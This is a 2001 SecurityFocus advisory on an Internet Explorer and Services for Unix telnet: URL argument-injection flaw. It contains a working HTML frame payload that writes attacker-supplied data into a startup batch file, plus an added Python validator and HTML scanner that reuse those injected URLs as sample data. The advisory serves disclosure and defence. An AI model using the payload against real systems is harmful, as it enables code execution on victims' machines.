-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SecurityFocus.com
http://www.securityfocus.com
Vulnerability Report For Internet Explorer and Services for Unix 2.0
Telnet Client
Date Published: 13 March 2001
Advisory ID: n/a
Bugtraq ID: 2463
CVE CAN: None currently assigned.
Title: Services for Unix 2.0 Telnet Client File Overwrite Vulnerability
Class: Input Validation Error
Remotely Exploitable: Yes
Locally Exploitable: Yes
A vulnerability has been discovered in the interaction between
Internet Explorer and the Telnet client installed with Services
for Unix 2.0 that allows arbitrary files to be created or
overwritten with attacker-specified data. The vulnerability
exists because Internet Explorer executes the "telnet" command
and passes command line parameters taken from the URL to the
telnet program without validating them.
The Windows 2000 Telnet client supports a client-side logging
option: when the "-f" flag is given on the command line followed by
a filename, all session text is logged to that file.
All versions of Internet Explorer with Services for Unix 2.0
installed are presumed to be vulnerable to this problem.
Solution/Vendor Information/Workaround:
Microsoft has released an update which solves this problem. The
update and more information can be obtained at the following
locations:
http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
http://www.microsoft.com/windows/ie/download/critical/q286043/default.asp
Updates are available for Internet Explorer 5.01 Service Pack 1
and Internet Explorer 5.5 Service Pack 1.
November 1, 2000
This vulnerability was discovered by Oliver Friedrichs
<[email protected]>.
This advisory was drafted with the help of the SecurityFocus.com
Vulnerability Help Team. For more information or assistance drafting
advisories please mail [email protected].
This vulnerability can be reproduced by giving Internet Explorer a
URL such as the following:
telnet:-f%20\file.txt%20host
The above example will cause Internet Explorer to invoke the telnet
client and cause it to connect to the host "host", logging all output
to the file "\file.txt". An attacker can cause arbitrary data to be
written to this file by running a rogue server (netcat, for example)
that listens on the telnet port and sends the desired data to the
client. An arbitrary port number can also be specified on the telnet
command line, so the server need not listen on port 23.
Furthermore, the invocation of the telnet client can be hidden within
existing HTML, automating its execution. This vulnerability can also
be exploited via Outlook, which by default will automatically process
HTML messages.
<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users
\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>
The above example will cause data that is received from port 8000 on
the host "host" to be written to the file "start.bat" in the startup
directory for all users. Assuming the logged in user has the
appropriate permissions, this will create a batch file that is
executed upon any future user logon. Note that if the username is
known to the attacker, the same technique can be directed at the
logged in user's own startup directory, where that user will have
permission to create the file.
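The defect class above is an input validation error: text taken from a
telnet: URL is placed on a command line unchecked, so "-f" and a path
become switches instead of a hostname. The following is an added
example, not code from this advisory, from SecurityFocus or from
Microsoft, showing the check a URL scheme handler should apply before
it builds a command line (accept only host[:port]) and the same check
applied as a scan over HTML for frames, links and iframes that carry
such URLs. The sample HTML, the host name bastion.example.net and the
function names are constructed for the example; the malicious frame
URL is the one quoted earlier in this advisory.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Only a plain hostname or dotted IPv4 literal is accepted as the host;
# anything that could be read as a switch or a path is rejected.
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]*$")


def parse_telnet_url(url):
    """Validate a telnet: URL and return (host, port).

    Accepts "telnet:host", "telnet:host:port" and "telnet://host:port/".
    %-escapes are decoded first (the advisory's URLs hide spaces as %20),
    then anything that is not a bare host[:port] raises ValueError, so the
    result can be passed as two separate arguments rather than as a string
    the telnet program will re-parse as a command line.
    """
    if not url.lower().startswith("telnet:"):
        raise ValueError("not a telnet: URL")
    rest = unquote(url[len("telnet:"):]).strip("/")
    if not rest:
        raise ValueError("missing host")
    if rest.startswith("-"):
        raise ValueError("option-like argument where a host was expected")
    if any(ch.isspace() or ch in "\\\"'" for ch in rest):
        raise ValueError("whitespace or quoting characters in host field")
    host, _, port_text = rest.partition(":")
    if not HOST_RE.match(host):
        raise ValueError("host is not a plain hostname")
    port = 23  # default telnet port when the URL names none
    if port_text:
        if not port_text.isdigit() or not 1 <= int(port_text) <= 65535:
            raise ValueError("port is not a number in 1..65535")
        port = int(port_text)
    return host, port


class TelnetUrlFinder(HTMLParser):
    """Collect telnet: URLs from attributes a browser would dereference."""

    URL_ATTRS = {"frame": "src", "iframe": "src", "a": "href", "img": "src"}

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        wanted = self.URL_ATTRS.get(tag)
        for name, value in attrs:
            if name == wanted and value and value.lower().startswith("telnet:"):
                self.found.append((tag, value))


def audit_html(html):
    """Return [(tag, url, verdict)] for every telnet: URL in the document.

    verdict is "ok" for a bare host[:port] URL, otherwise the reason the
    URL would have been rejected by parse_telnet_url.
    """
    finder = TelnetUrlFinder()
    finder.feed(html)
    finder.close()
    report = []
    for tag, url in finder.found:
        try:
            parse_telnet_url(url)
            verdict = "ok"
        except ValueError as exc:
            verdict = "argument injection: " + str(exc)
        report.append((tag, url, verdict))
    return report


# Constructed sample: the hidden frame carries the advisory's reproduction
# URL, the link is a legitimate host:port URL, the iframe mixes case.
SAMPLE_HTML = """<html>
<frameset rows="100%,*">
<frame src="about:blank">
<frame src="telnet:-f%20\\file.txt%20host">
</frameset>
<a href="telnet://bastion.example.net:2323/">console</a>
<iframe src="TELNET:-f%20C:\\session.log%20host%208000"></iframe>
</html>"""


if __name__ == "__main__":
    for tag, url, verdict in audit_html(SAMPLE_HTML):
        print(f"<{tag}> {url!r}: {verdict}")
```

The handler side matters more than the scanner: once the host and port
are validated as two separate values, the telnet program can be started
with exactly those two arguments and no URL-derived text ever reaches
its option parser, which is the property the affected Internet Explorer
handler lacked.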
DISCLAIMER:
The contents of this advisory are copyright (c) 2000 SecurityFocus.com
and may be distributed freely provided that no fee is charged for this
distribution and proper credit is given.
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBOq6xlcm4FXxxREdXEQI+8wCfcnxnmIR8nDqOgqlGFxa5nbQldUcAoLW6
uW9Hz+AFB3j7rcJga+DGqUlu
=qvCI
-----END PGP SIGNATURE-----